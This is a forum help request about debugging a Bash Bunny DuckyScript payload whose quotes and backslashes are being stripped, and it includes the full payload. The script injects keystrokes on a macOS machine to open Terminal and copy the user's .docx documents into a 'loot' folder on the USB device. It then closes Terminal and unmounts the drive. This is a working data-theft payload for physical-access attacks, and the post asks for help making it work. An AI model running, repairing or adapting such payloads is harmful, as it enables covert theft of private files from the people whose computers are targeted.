Hello,
I am working on a script to copy document files from an OSX user's documents directory, and there seems to be an issue with text encoding of my copy command.
The script is suppose to open a terminal, copy 20 seconds worth of docx files from the users ./Documents directory to /Volumes/BashBunny/loot directory, then close the terminal, unmount the drive, then make the led green. I created the loot dir on the root of the bunny ahead of time. The line that is having trouble is here"
QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;
Here is the terminal output from when the bunny runs this line:
find ./Documents -iname *.docx -exec cp {} /Volumes/BashBunny/loot ;
find: -exec: no terminating ";" or "+"
The bunny seems to be stripping quotes and backslashes. I have tried to use similar bash commands with other special characters, but I also seem to have the same issue with pipes. I rewrote everything just having the bunny call a bash script. I had no issues using that approach, but I want to get it working in duckyscript and not rely on additional scripts.
I also noticed when trying to access directories using ~/, the bunny changed my text to /root, although the username on the target system that was executing the payload was not root. Reading through the duckyscript and bashbunny wikis do not seem to mention any of this substitution, unless I am colpeltely missing it...
Thanks!
LED R
ATTACKMODE HID STORAGE
source bunny_helpers.sh
LED B
QUACK DELAY 1000
QUACK COMMAND SPACE
QUACK DELAY 800
QUACK STRING Terminal
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;
QUACK ENTER
QUACK DELAY 10000
QUACK DELAY 10000
QUACK COMMAND q
QUACK DELAY 500
QUACK ENTER
QUACK COMMAND SPACE
QUACK DELAY 800
QUACK STRING Terminal
QUACK DELAY 800
QUACK ENTER
QUACK STRING diskutil unmount /Volumes/BashBunny
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 500
QUACK COMMAND q
QUACK DELAY 500
QUACK ENTER
LED G